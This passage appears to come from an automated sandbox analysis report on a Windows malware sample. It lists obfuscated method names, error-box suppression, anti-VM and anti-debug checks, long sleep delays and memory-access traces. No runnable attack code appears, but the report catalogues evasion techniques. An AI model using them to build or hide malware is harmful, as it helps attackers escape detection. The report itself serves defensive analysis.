                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
                  Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                  Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: dGHiTqj3AB.exe PID: 7512, type: MEMORYSTR
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 1020000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 4CD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 78C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 88C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 8A60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 9A60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194096E rdtsc 3_2_0194096E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeWindow / User API: threadDelayed 9835Jump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeAPI coverage: 0.7 %
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI coverage: 2.6 %
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe TID: 7532Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740Thread sleep count: 137 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740Thread sleep time: -274000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740Thread sleep count: 9835 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740Thread sleep time: -19670000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe TID: 7228Thread sleep time: -45000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\mcbuilder.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030AC410 FindFirstFileW,FindNextFileW,FindClose,8_2_030AC410
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: firefox.exe, 0000000B.00000002.2736398838.0000018B0A71C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000335D000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3492532722.00000000009FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194096E rdtsc 3_2_0194096E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00417A03 LdrLoadDll,3_2_00417A03
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198019F mov eax, dword ptr fs:[00000030h]3_2_0198019F
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198019F mov eax, dword ptr fs:[00000030h]3_2_0198019F
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198019F mov eax, dword ptr fs:[00000030h]3_2_0198019F
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198019F mov eax, dword ptr fs:[00000030h]3_2_0198019F
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01940185 mov eax, dword ptr fs:[00000030h]3_2_01940185
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BC188 mov eax, dword ptr fs:[00000030h]3_2_019BC188
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BC188 mov eax, dword ptr fs:[00000030h]3_2_019BC188
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FA197 mov eax, dword ptr fs:[00000030h]3_2_018FA197
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FA197 mov eax, dword ptr fs:[00000030h]3_2_018FA197
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FA197 mov eax, dword ptr fs:[00000030h]3_2_018FA197
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A4180 mov eax, dword ptr fs:[00000030h]3_2_019A4180
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A4180 mov eax, dword ptr fs:[00000030h]3_2_019A4180
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E1D0 mov eax, dword ptr fs:[00000030h]3_2_0197E1D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E1D0 mov eax, dword ptr fs:[00000030h]3_2_0197E1D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0197E1D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E1D0 mov eax, dword ptr fs:[00000030h]3_2_0197E1D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E1D0 mov eax, dword ptr fs:[00000030h]3_2_0197E1D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C61C3 mov eax, dword ptr fs:[00000030h]3_2_019C61C3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C61C3 mov eax, dword ptr fs:[00000030h]3_2_019C61C3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019301F8 mov eax, dword ptr fs:[00000030h]3_2_019301F8
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D61E5 mov eax, dword ptr fs:[00000030h]3_2_019D61E5
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AA118 mov ecx, dword ptr fs:[00000030h]3_2_019AA118
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AA118 mov eax, dword ptr fs:[00000030h]3_2_019AA118
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AA118 mov eax, dword ptr fs:[00000030h]3_2_019AA118
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AA118 mov eax, dword ptr fs:[00000030h]3_2_019AA118
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C0115 mov eax, dword ptr fs:[00000030h]3_2_019C0115
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE10E mov eax, dword ptr fs:[00000030h]3_2_019AE10E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE10E mov ecx, dword ptr fs:[00000030h]3_2_019AE10E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE10E mov eax, dword ptr fs:[00000030h]3_2_019AE10E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE10E mov eax, dword ptr fs:[00000030h]3_2_019AE10E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE10E mov ecx, dword ptr fs:[00000030h]3_2_019AE10E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE10E mov eax, dword ptr fs:[00000030h]3_2_019AE10E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE10E mov eax, dword ptr fs:[00000030h]3_2_019AE10E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE10E mov ecx, dword ptr fs:[00000030h]3_2_019AE10E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE10E mov eax, dword ptr fs:[00000030h]3_2_019AE10E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE10E mov ecx, dword ptr fs:[00000030h]3_2_019AE10E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01930124 mov eax, dword ptr fs:[00000030h]3_2_01930124
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01998158 mov eax, dword ptr fs:[00000030h]3_2_01998158
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01906154 mov eax, dword ptr fs:[00000030h]3_2_01906154
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01906154 mov eax, dword ptr fs:[00000030h]3_2_01906154
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FC156 mov eax, dword ptr fs:[00000030h]3_2_018FC156
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01994144 mov eax, dword ptr fs:[00000030h]3_2_01994144
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01994144 mov eax, dword ptr fs:[00000030h]3_2_01994144
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01994144 mov ecx, dword ptr fs:[00000030h]3_2_01994144
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01994144 mov eax, dword ptr fs:[00000030h]3_2_01994144
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01994144 mov eax, dword ptr fs:[00000030h]3_2_01994144
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4164 mov eax, dword ptr fs:[00000030h]3_2_019D4164
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4164 mov eax, dword ptr fs:[00000030h]3_2_019D4164
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190208A mov eax, dword ptr fs:[00000030h]3_2_0190208A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C60B8 mov eax, dword ptr fs:[00000030h]3_2_019C60B8
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C60B8 mov ecx, dword ptr fs:[00000030h]3_2_019C60B8
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F80A0 mov eax, dword ptr fs:[00000030h]3_2_018F80A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019980A8 mov eax, dword ptr fs:[00000030h]3_2_019980A8
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019820DE mov eax, dword ptr fs:[00000030h]3_2_019820DE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019420F0 mov ecx, dword ptr fs:[00000030h]3_2_019420F0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FA0E3 mov ecx, dword ptr fs:[00000030h]3_2_018FA0E3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019860E0 mov eax, dword ptr fs:[00000030h]3_2_019860E0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019080E9 mov eax, dword ptr fs:[00000030h]3_2_019080E9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FC0F0 mov eax, dword ptr fs:[00000030h]3_2_018FC0F0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191E016 mov eax, dword ptr fs:[00000030h]3_2_0191E016
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191E016 mov eax, dword ptr fs:[00000030h]3_2_0191E016
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191E016 mov eax, dword ptr fs:[00000030h]3_2_0191E016
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191E016 mov eax, dword ptr fs:[00000030h]3_2_0191E016
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01984000 mov ecx, dword ptr fs:[00000030h]3_2_01984000
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A2000 mov eax, dword ptr fs:[00000030h]3_2_019A2000
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A2000 mov eax, dword ptr fs:[00000030h]3_2_019A2000
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A2000 mov eax, dword ptr fs:[00000030h]3_2_019A2000
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A2000 mov eax, dword ptr fs:[00000030h]3_2_019A2000
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A2000 mov eax, dword ptr fs:[00000030h]3_2_019A2000
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A2000 mov eax, dword ptr fs:[00000030h]3_2_019A2000
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A2000 mov eax, dword ptr fs:[00000030h]3_2_019A2000
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A2000 mov eax, dword ptr fs:[00000030h]3_2_019A2000
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01996030 mov eax, dword ptr fs:[00000030h]3_2_01996030
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FA020 mov eax, dword ptr fs:[00000030h]3_2_018FA020
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FC020 mov eax, dword ptr fs:[00000030h]3_2_018FC020
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01902050 mov eax, dword ptr fs:[00000030h]3_2_01902050
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01986050 mov eax, dword ptr fs:[00000030h]3_2_01986050
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192C073 mov eax, dword ptr fs:[00000030h]3_2_0192C073
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FE388 mov eax, dword ptr fs:[00000030h]3_2_018FE388
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FE388 mov eax, dword ptr fs:[00000030h]3_2_018FE388
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FE388 mov eax, dword ptr fs:[00000030h]3_2_018FE388
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F8397 mov eax, dword ptr fs:[00000030h]3_2_018F8397
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F8397 mov eax, dword ptr fs:[00000030h]3_2_018F8397
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F8397 mov eax, dword ptr fs:[00000030h]3_2_018F8397
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192438F mov eax, dword ptr fs:[00000030h]3_2_0192438F
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192438F mov eax, dword ptr fs:[00000030h]3_2_0192438F
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE3DB mov eax, dword ptr fs:[00000030h]3_2_019AE3DB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE3DB mov eax, dword ptr fs:[00000030h]3_2_019AE3DB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE3DB mov ecx, dword ptr fs:[00000030h]3_2_019AE3DB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019AE3DB mov eax, dword ptr fs:[00000030h]3_2_019AE3DB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A43D4 mov eax, dword ptr fs:[00000030h]3_2_019A43D4
